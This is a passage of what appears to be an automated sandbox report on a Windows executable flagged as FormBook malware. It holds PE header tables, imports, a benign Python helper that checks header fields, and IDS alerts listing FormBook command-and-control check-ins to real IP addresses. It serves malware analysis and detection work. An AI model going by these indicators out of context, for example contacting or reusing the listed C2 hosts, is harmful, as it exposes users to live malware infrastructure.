                                                    jmp dword ptr [00000000h+edx*4]
                                                    Programming Language:
                                                    • [ C ] VS2010 SP1 build 40219
                                                    • [C++] VS2010 SP1 build 40219
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2010 SP1 build 40219
                                                    • [RES] VS2010 SP1 build 40219
                                                    • [LNK] VS2010 SP1 build 40219
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
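A few checks that fall straight out of the static fields above: the entry point 0x4165c1 minus the 0x400000 image base lands inside .text; the link timestamp 0x4F25BAEC decodes to the Sunday in January 2012 the report prints; the only DLL characteristic set is TERMINAL_SERVER_AWARE, so the image opts into neither ASLR (DYNAMIC_BASE) nor DEP (NX_COMPAT), and with RELOCS_STRIPPED set and an empty BASERELOC directory it could not be relocated anyway; and the four sections' raw sizes sum to about 648 KB while the file is 1,353,653 bytes, so roughly 700 KB sit past the last section as an overlay, consistent with the whole-file entropy (7.54) being higher than that of any single section (at most 6.68). The added example below (not Joe Sandbox code) encodes these checks; the values are transcribed from the report, and the 0x400 header size and back-to-back section layout are assumptions, since raw offsets are not listed.

```python
"""Sanity checks over the static PE fields reported above. Added example, not
Joe Sandbox code. Values are transcribed from the report; HEADERS_SIZE and a
contiguous section layout are assumptions (the table lists raw sizes, not raw
offsets), so overlay_size() is an estimate."""
from datetime import datetime, timezone

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h)
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h)
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY", 0x0100: "NX_COMPAT",
    0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
MITIGATION_BITS = {"DYNAMIC_BASE": 0x0040, "NX_COMPAT": 0x0100, "NO_SEH": 0x0400, "GUARD_CF": 0x4000}

# Transcribed from the section table: (name, virtual address, virtual size, raw size)
SECTIONS = [
    (".text", 0x1000, 0x8061c, 0x80800),
    (".rdata", 0x82000, 0xdfc0, 0xe000),
    (".data", 0x90000, 0x1a758, 0x6800),
    (".rsrc", 0xab000, 0x9328, 0x9400),
]
IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x4165c1
TIMESTAMP = 0x4F25BAEC
FILE_SIZE = 1_353_653
BASERELOC_SIZE = 0       # IMAGE_DIRECTORY_ENTRY_BASERELOC virtual size from the directory table
HEADERS_SIZE = 0x400     # assumption: SizeOfHeaders is not shown in the report


def decode_flags(value: int, table: dict) -> list:
    """Names of the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def encode_flags(names, table: dict) -> int:
    inverse = {v: k for k, v in table.items()}
    return sum(inverse[n] for n in names)


def timestamp_utc(ts: int) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def section_for_rva(rva: int, sections=SECTIONS):
    """Section whose virtual range contains rva, or None (entry point in headers/overlay is a red flag)."""
    for name, va, vsize, _raw in sections:
        if va <= rva < va + vsize:
            return name
    return None


def missing_mitigations(dll_characteristics: int) -> list:
    return [n for n, bit in MITIGATION_BITS.items() if not dll_characteristics & bit]


def relocatable(file_characteristics: int, basereloc_size: int) -> bool:
    """ASLR needs relocations: RELOCS_STRIPPED or an empty .reloc directory rules it out."""
    return not (file_characteristics & 0x0001) and basereloc_size > 0


def overlay_size(file_size: int, sections=SECTIONS, headers=HEADERS_SIZE) -> int:
    """Bytes past the last section, assuming sections follow the headers back to back."""
    end_of_image = headers + sum(s[3] for s in sections)
    return max(0, file_size - end_of_image)


if __name__ == "__main__":
    fc = encode_flags(["RELOCS_STRIPPED", "EXECUTABLE_IMAGE", "LARGE_ADDRESS_AWARE", "32BIT_MACHINE"],
                      FILE_CHARACTERISTICS)
    dc = encode_flags(["TERMINAL_SERVER_AWARE"], DLL_CHARACTERISTICS)
    print("link time          :", timestamp_utc(TIMESTAMP))
    print("entry point section:", section_for_rva(ENTRY_POINT_VA - IMAGE_BASE))
    print("relocatable (ASLR) :", relocatable(fc, BASERELOC_SIZE))
    print("missing mitigations:", missing_mitigations(dc))
    print("estimated overlay  :", overlay_size(FILE_SIZE), "bytes")
```

The overlay estimate is the actionable number: whatever follows the last section is not mapped by the loader and not covered by any section hash in the table, so it is where to look next when carving the file.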
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974 |
| RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689 |
| RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919 |
| RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474 |
| RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856 |
| RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445 |
| RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021 |
| RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758 |
| RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702 |
| RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9 |
| RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508 |
| RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976 |
| RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713 |
| RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365 |
| RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531 |
| RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186 |
| RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939 |
| RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718 |
| RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581 |
| DLL | Import |
|---|---|
| WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv |
| VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy |
| MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW |
| WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable |
| PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules |
| USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW |
| KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA |
| USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, |
AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                    GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                    OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T09:23:04.559019+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49781 | 85.159.66.93 | 80 | TCP
2024-09-26T09:23:04.559019+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49781 | 85.159.66.93 | 80 | TCP
2024-09-26T09:23:55.434101+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 148.72.152.174 | 80 | TCP
2024-09-26T09:23:55.434101+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 148.72.152.174 | 80 | TCP
2024-09-26T09:24:10.970988+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 3.33.130.190 | 80 | TCP
2024-09-26T09:24:13.521153+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49739 | 3.33.130.190 | 80 | TCP
2024-09-26T09:24:16.052736+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49740 | 3.33.130.190 | 80 | TCP
2024-09-26T09:24:21.563900+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP
2024-09-26T09:24:21.563900+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP
2024-09-26T09:24:27.786721+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 172.191.244.62 | 80 | TCP
2024-09-26T09:24:30.335442+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 172.191.244.62 | 80 | TCP
2024-09-26T09:24:32.880497+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 172.191.244.62 | 80 | TCP
2024-09-26T09:24:35.420856+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49745 | 172.191.244.62 | 80 | TCP
2024-09-26T09:24:35.420856+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49745 | 172.191.244.62 | 80 | TCP
2024-09-26T09:24:41.763173+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49746 | 172.96.191.39 | 80 | TCP
2024-09-26T09:24:44.289289+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49747 | 172.96.191.39 | 80 | TCP
2024-09-26T09:24:46.853309+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49748 | 172.96.191.39 | 80 | TCP
2024-09-26T09:24:49.378438+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49749 | 172.96.191.39 | 80 | TCP
2024-09-26T09:24:49.378438+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49749 | 172.96.191.39 | 80 | TCP
2024-09-26T09:25:00.076321+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49750 | 217.70.184.50 | 80 | TCP
2024-09-26T09:25:02.640352+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49751 | 217.70.184.50 | 80 | TCP
2024-09-26T09:25:05.171228+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49752 | 217.70.184.50 | 80 | TCP
2024-09-26T09:25:07.759988+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49753 | 217.70.184.50 | 80 | TCP
2024-09-26T09:25:07.759988+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49753 | 217.70.184.50 | 80 | TCP
2024-09-26T09:25:13.976010+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49754 | 63.250.47.40 | 80 | TCP
2024-09-26T09:25:16.518559+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49755 | 63.250.47.40 | 80 | TCP
2024-09-26T09:25:19.075531+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49756 | 63.250.47.40 | 80 | TCP
2024-09-26T09:25:21.626143+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49757 | 63.250.47.40 | 80 | TCP
2024-09-26T09:25:21.626143+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49757 | 63.250.47.40 | 80 | TCP
2024-09-26T09:25:28.201219+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49758 | 91.184.0.200 | 80 | TCP
2024-09-26T09:25:29.847472+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49759 | 91.184.0.200 | 80 | TCP
2024-09-26T09:25:32.503709+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49760 | 91.184.0.200 | 80 | TCP
2024-09-26T09:25:34.954937+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49761 | 91.184.0.200 | 80 | TCP
2024-09-26T09:25:34.954937+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49761 | 91.184.0.200 | 80 | TCP
2024-09-26T09:25:40.470004+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49762 | 13.248.169.48 | 80 | TCP
2024-09-26T09:25:43.017322+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 13.248.169.48 | 80 | TCP
2024-09-26T09:25:45.577550+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49764 | 13.248.169.48 | 80 | TCP
2024-09-26T09:25:48.123872+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | TCP
2024-09-26T09:25:48.123872+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | TCP
2024-09-26T09:26:08.214268+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49770 | 43.242.202.169 | 80 | TCP
2024-09-26T09:26:10.737327+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49771 | 43.242.202.169 | 80 | TCP
2024-09-26T09:26:13.288202+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49772 | 43.242.202.169 | 80 | TCP
2024-09-26T09:26:16.665501+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49773 | 43.242.202.169 | 80 | TCP
2024-09-26T09:26:16.665501+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49773 | 43.242.202.169 | 80 | TCP
2024-09-26T09:26:23.209876+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49774 | 103.224.182.242 | 80 | TCP
2024-09-26T09:26:25.747416+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49775 | 103.224.182.242 | 80 | TCP
2024-09-26T09:26:28.315372+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49776 | 103.224.182.242 | 80 | TCP
2024-09-26T09:26:30.855122+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49777 | 103.224.182.242 | 80 | TCP
2024-09-26T09:26:30.855122+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49777 | 103.224.182.242 | 80 | TCP
2024-09-26T09:26:37.512382+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49778 | 85.159.66.93 | 80 | TCP
2024-09-26T09:26:40.061281+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49779 | 85.159.66.93 | 80 | TCP
